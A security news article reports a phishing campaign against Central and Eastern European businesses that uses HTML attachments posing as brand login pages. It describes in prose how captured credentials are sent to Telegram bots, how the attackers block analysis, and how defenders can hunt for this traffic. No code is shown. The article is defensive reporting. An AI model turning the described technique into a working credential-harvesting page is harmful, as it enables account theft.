A sophisticated phishing campaign is currently targeting organizations throughout Central and Eastern Europe, employing deceptive tactics to steal user login credentials. This latest threat, identified by security analysts, impersonates well-known global brands such as Microsoft 365, Adobe, WeTransfer, FedEx, and DHL. The campaign’s efficacy stems from its novel delivery method, utilizing self-contained HTML files as email attachments, thereby bypassing traditional security measures that often flag suspicious URLs or external server dependencies. The focus on these specific brands and the operational nuances observed suggest a calculated approach aimed at exploiting regional business practices.
The threat actors behind this operation are distributing phishing emails that convincingly mimic communications from legitimate customers or business partners. These emails often request quotations or invoice confirmations, using RFC-compliant filenames like RFQ_4460-INQUIRY.HTML to appear authentic. This targeted strategy is designed to ensnare businesses operating in sectors with regular procurement workflows, including agriculture, automotive, construction, and education. The primary affected regions currently include the Czech Republic, Slovakia, Hungary, and Germany, according to findings from Cyble security analysts.
Campaign Overview and Methodology
Cyble security analysts have detailed how this sophisticated phishing campaign achieves its success through embedded JavaScript within HTML attachments. This code captures sensitive login credentials, including email addresses and passwords, along with technical data like IP addresses and user-agent information. Crucially, instead of relying on traditional command-and-control servers, the stolen data is transmitted directly to attacker-controlled Telegram bots. This innovative exfiltration method circumvents many common security monitoring tools.
Upon execution, victims are presented with highly convincing fake login pages that meticulously replicate the branding and interface of legitimate services. Blurred background images and authentic brand elements are employed to enhance the illusion of legitimacy, making it difficult for users to discern the fraudulent nature of the pages. The campaign has demonstrated a clear understanding of how to create a seamless user experience that can effectively bypass conventional email security controls and trick unsuspecting employees.
The credential capture mechanism is technically implemented by reading the values entered into form fields on the fake login pages. These captured details are then packaged into API requests and sent directly to Telegram bots via the Telegram Bot API. Technical analysis has revealed at least two distinct implementation strategies among the analyzed samples. The first variant implements CryptoJS AES encryption to obfuscate the captured data before transmitting it. This method also redirects victims to legitimate company domains to further mask the malicious activity.
In contrast, a second sample exhibits more advanced anti-forensics techniques. This variant actively blocks certain keyboard combinations, such as F12, Ctrl+U/S/C/A/X, and right-click context menus. These measures are designed to prevent security researchers or analysis tools from inspecting or deciphering the underlying malicious code, adding a layer of difficulty for threat intelligence gathering.
The exfiltration function itself demonstrates a high degree of technical sophistication. Instead of relying on less efficient methods like jQuery dependencies, the attackers utilize the native Fetch API for cleaner and more direct code implementation. The JavaScript constructs POST requests containing the harvested credentials. These requests are sent via HTTPS to specific `api.telegram.org/bot` endpoints. The critical bot tokens and chat IDs required for this communication are embedded directly within the payload, avoiding the need for external configuration files or suspicious network patterns.
This deliberate avoidance of easily detectable network traffic, coupled with the decentralized infrastructure of Telegram bots, contributes to the campaign’s operational resilience. The strategy ensures that even if one bot is identified and taken down, the entire operation is unlikely to be compromised. The current focus on Central and Eastern Europe and the specific industries targeted indicate a well-researched and strategic operation by the threat actors.
Recommendations and Future Outlook
Given the nature of this threat, organizations are strongly advised to prioritize the deployment of robust HTML attachment controls. Implementing content inspection policies to block or sandbox potentially malicious HTML files before they reach end-users is a critical first step. Security teams should also actively hunt for any `api.telegram.org` POST activity originating from internal client systems. Conducting retroactive threat hunts for identified indicators of compromise (IOCs) is essential to assess the extent of any credential compromise and identify affected accounts.
The ongoing evolution of phishing techniques, particularly those leveraging increasingly sophisticated delivery mechanisms like self-contained HTML files, necessitates continuous vigilance and adaptation of security postures. The effectiveness of this campaign underscores the importance of user education and awareness training in recognizing and reporting suspicious communications. As threat actors refine their methods, security professionals must remain informed about emerging attack vectors and proactively implement defensive strategies to protect organizational assets and sensitive data.